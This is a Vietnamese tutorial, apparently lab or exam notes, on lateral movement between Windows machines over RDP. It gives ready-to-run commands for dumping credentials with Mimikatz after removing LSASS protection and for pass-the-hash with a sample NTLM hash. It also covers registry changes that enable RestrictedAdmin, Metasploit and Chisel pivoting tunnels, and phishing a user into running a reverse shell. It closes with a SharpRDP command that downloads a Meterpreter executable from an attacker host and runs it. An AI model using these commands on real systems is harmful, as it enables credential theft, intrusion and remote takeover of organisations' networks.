Leo thang đặc quyền ngang trên Windows

Chiếm quyền truy cập vào một Server hay một Client trong một hệ thống mạng nội bộ chỉ là bước đầu tiên trong quá trình xâm nhập điển hình. Khi chúng ta có quyền truy cập ban đầu, mục tiêu của chúng ta là xâm phạm càng nhiều càng tốt tài sản của tổ chức, để từ đó có được quyền truy cập đặc biệt hơn hoặc có đặc quyền truy xuất các thông tin bí mật.

Một chiến dịch sử dụng email độc hại được gửi từ các thành viên trong nội bộ công ty sẽ mang tính chất uy tín hơn so với một email được gửi từ bên ngoài. Một thiết bị IOT (máy in, camera) sẽ dễ dàng bị tổn thương hơn so với một máy chủ được cập nhật thường xuyên. Đồng thời chúng ta cũng có thể sử dụng các thông tin đăng nhập bị rò rỉ để có quyền truy cập vào hệ thống internal.

Mặc dù có nhiều kỹ thuật Lateral Movement mà ta có thể tận dụng để chống lại Windows, tuy nhiên hầu hết dựa vào việc sử dụng lại hash NTLM hoặc ticket Kerberos. Các kỹ thuật có giá trị hoạt động tốt với cả workstation & server

Trong phần này, chúng ta sẽ tập trung khai thác một số kỹ thuật Lateral Movement mà không dựa vào các lỗ hổng phần mềm.

Chúng ta sẽ bắt đầu với Remote Desktop Protocol

1. Về Remote Desktop Protocol

Remote Desktop Protocol (RDP) là một giao thức mạng do Microsoft phát triển, được sử dụng để giao tiếp giữa Client và Server. Nó được sử dụng phổ biến trong nhiều môi trường doanh nghiệp để quản trị từ xa. Đây cũng có thể là một công cụ tuyệt vời để có thể lợi dụng lateral movement.

1.1. Lateral Movement with RDP

Mặc dù được thiết kế cho quản trị viên hệ thống, nhưng RDP có thể bị những kẻ tấn công lạm dụng.

Ở đây ta xây dựng một môi trường như sau:

Bài toán đặt ra khi ta đã có thông tin đăng nhập vào corp1 , appsrv01 và cần thông tin để đăng nhập vào máy chủ DC (thông tin đăng nhập lab/lab)

Ta tiến hành đăng nhập vào máy chủ corp1

xfreerdp /f /u:"corp1\lab" /v:"192.168.138.10" /p:"lab"

Sau đó tiến hành RDP vào "appsrv01" .

Ở đây, chúng ta hoàn toàn không thể đăng nhập trực tiếp từ máy Kali đến appsrv01 vì đơn giản chúng ta đang không được join Domain. Việc sử dụng RDP cho phép ta đăng nhập vào appsrv01 thông qua corp1

Thông thường nếu chúng ta kết nối với máy A với tài khoản X. Thì những ai đang sử dụng tài khoản X này sẽ ngay lập tức bị ngắt kết nối. Để tránh điều đó xảy ra , sử dụng tùy chọn /admin để cho phép với phiên quản trị

Khi một kết nối RDP được tạo, các NTLM hash sẽ nằm trong memory trong suốt thời gian của phiên. Phiên này sẽ không terminate nếu không được logout đúng cách,có nghĩa là chỉ cần ngắt kết nối khỏi các phiên sẽ để lại hash trong memory. Đây là một vector chúng ta có thể lợi dụng để tấn công.

Kiểm tra thông tin đăng nhập của người dùng lab trên appsrv01 với Mimikatz .

C:\Tools\mimikatz.exe (administrative console) > disable LSA protection > Dump Credential

privilege::debug

!processprotect /process:lsass.exe /remove

sekurlsa::logonpasswords

Kết quả mimikatz

Điều này sẽ cực kỳ có ích nếu chúng ta xâm nhập được vào máy chủ JUMP. Chúng ta có thể dump bất kỳ thông tin đăng nhập đã nào đã cache lạ

Máy chủ JUMP là một máy chủ đặc biệt trong doanh nghiệp, được sử dụng để đăng nhập vào các tài nguyên trong nội bộ. Ví dụ thay vì RDP trực tiếp vào Server, ta RDP vào JUMP Server trước rồi từ đó mới RDP vào Server

Trong nỗ lực ngăn chặn những kẻ tấn công đánh cắp thông tin đăng nhập trên máy chủ bị xâm nhập. Microsoft đã giới thiệu tính năng RDP Restricted Admin Mode cho phép quản trị viên hệ thống thực hiện đăng nhập RDP an toàn. Tính năng này cho phép đăng nhập không yêu cầu thông tin xác thực dạng bản rõ và đồng thời không lưu trữ chúng trong memory.

Loại đăng nhập này thường được sử dụng bới các service accounts ( nó sử dụng chính thông tin đang đăng nhập đang sử dụng ở máy chủ A cho máy chủ B)

Chúng ta có thể sử dụng chế độ quản trị hạn chế bằng cách cung cấp tham số /restrictedadmin cho mstsc.exe.

Chúng ta thử tiến hành DUMP thông tin với Mimikatz

C:\Tools\mimikatz.exe (administrative console) > disable LSA protection > Dump Credential

privilege::debug

!processprotect /process:lsass.exe /remove

sekurlsa::logonpasswords

Kết quả không thấy NTLM hash của lab. Việc này cho phép tránh khỏi các cuộc tấn công trích xuất dữ liệu từ cache Tuy nhiên lại "nảy nòi" ra một cuộc tấn công khác dựa trên tính năng này - Pass The Hash

Quay lại bên trên ta thấy rằng, người dùng lab đăng nhập vào appsrv01 mà không cần nhập password. Điều này cho thấy NTLM hash đã được sử dụng để trực tiếp đăng nhập thay cho mật khẩu.

Ở đây ta giả định rằng chúng ta đã sở hữu NTLM hash của admin và đã đăng nhập vào với tư cách người dùng lab

Thông tin như sau

user : admin
domain : corp1
ntlm:2892D26CDF84D7A20E2EB3B9A05C425E

Thực hiện cuộc tấn công Pass-the-Hash với Mimikatz

privilege::debug

sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A20E2EB3B9A05C425E /run:"mstsc.exe /restrictedadmin"

Nếu tính năng này không được bật . Chúng ta cần bật nó lên để sử dụng

Điều đầu tiên chúng ta sẽ phải tắt tính năng RestrictedAdmin (xác nhận được rằng nó bị tắt) sau đó sử dụng Pass-the-hash để bật nó lên

Để tắt RestrictedAdmin trên appsrv01 ta sử dụng command

Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin

Xác nhận chức năng này đã bị tắt

Bây giờ chúng ta sẽ bật nó lên với Powershell

Trên máy Windows 10 tiến hành PTH (run powershell thay vì mstsc.exe)

sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A20E2EB3B9A05C425E /run:powershell

Trên Powershell (lúc này đang chạy với session admin của appsrv01). Ta tiến hành bật RestrictedAdmin

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

Kết quả thành công, chúng ta lại có thể tiếp tục PTH

Lần này chúng ta có thể sử dụng xfreerdp để PTH

1.2.Reverse RDP Proxying with Metasploit

Có quyền truy cập GUI vào một máy bị xâm nhập giúp ta có thể đơn giản hóa rất nhiều các hoạt động post-exploit. Tuy nhiên có nhiều cơ chế bảo vệ có thể làm phức tạp cách tiếp cận này. Đặc trưng nhất là Firewall và NAT

Ta xem xét mô hình sau

Giả sử ta đã chiếm quyền điều khiển một máy trong Local thông qua phishing và có đầy đủ thông tin để đăng nhập thông qua RDP. Tuy nhiên do FW đã block phương thức này, ta buộc phải sử dụng "kết nối hiện tại" để tạo tunnel cho RDP traffic

Ta sử dụng meterpreter để thực hiện điều này

Đầu tiên ta tạo 1 revershell trên máy Kali

Tiếp tới, ta tiến hành phishing để người dùng thực thi mã ( Ví dụ thế )

Sau khi người dùng thực thi mã, ta có 1 connection

Tiến hành Pivoting

use multi/manage/autoroute
set session 2
exploit
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
exploit -j

Chúng ta có thể sử dụng proxychain để tiến hành định tuyến

sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf'

Sử dụng proxychain để RDP vào target

proxychains rdesktop 192.168.138.10

1.4.Reverse RDP Proxying with Chisel

Trong một số trường hợp, không thể sử dụng meterpreter (do đi thi bị cấm hay nó một lý do khác) chúng ta phải dựa vào các ứng dụng độc lập. Công cụ truyền thống được lựa chọn cho việc này là phiên bản command line của puttty là plink. Tuy nhiên chúng ta sẽ sử dụng một công cụ "xịn" hơn là chisel để tiến hành công việc này

Chisel là một phần mềm tạo tunnel mã nguồn mở - xây dựng trên ngôn ngữ lập trình golang. Nó hoạt động băng cách thiết lập một tunnel TCP và thực hiện truyền dữ liệu thông qua HTTP đồng thời bảo mật nó bằng SSH.

Cài đặt Chisel

sudo apt-get install golang
git clone https://github.com/jpillora/chisel.git
cd chisel/
go build

Với phiên bản Linux đã được biên dịch, chúng ta sẽ chuyển sang phiên bản Windows.

env GOOS=windows GOARCH=amd64 go build -o chisel.exe -ldflags "-s -w"

Trên máy Kali

Ta tiến hành thiết lập reverse tunnel

./chisel server -p 8080 --socks5

Tiếp theo, ta tiến hành cấu hình máy chủ proxy SOCKS với SSH

ssh -N -D 0.0.0.0:2080 localhost

Trên máy nạn nhân

chisel.exe client 192.168.149.138:8080 socks

Cuối cùng ta có thể kết nối RDP qua tunnel

sudo proxychains rdesktop 192.168.138.10

Kết nối thành công !!!!

Trong môi trường thực tế, nếu Server có kết nối internet, ta có thể sử dụng Ngrok để thiết lập tunnel - chuyển RPD traffic qua đó

1.3.RDP as a Console

Mặc dù RPD được biết tới với giao diện GUI, tuy nhiên ta cũng có thể sử dụng nó như một công cụ dòng lệnh. Kỹ thuật này sẽ làm giảm lưu lượng kết nối , tránh bị "lag" trong quá trình tấn công

SharpRDP là một ứng dụng được viết bằng C#, sử dụng giao diện lệnh để hiển thị với chức năng kết nối như mstsc.exe

SharpRDP được sử dụng như sau :

SharpRDP.exe computername=appsrv01 command=ipconfig username=corp1\lab password=lab

Dễ dàng nhận thấy được, đây là "Blind Command" , trên thực tế chúng ta có thể làm điều này hữu ích hơn bằng cách chạy một revershell

sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/met.exe', 'C:\Windows\Tasks\met.exe'); C:\Windows\Tasks\met.exe" username=corp1\lab password=lab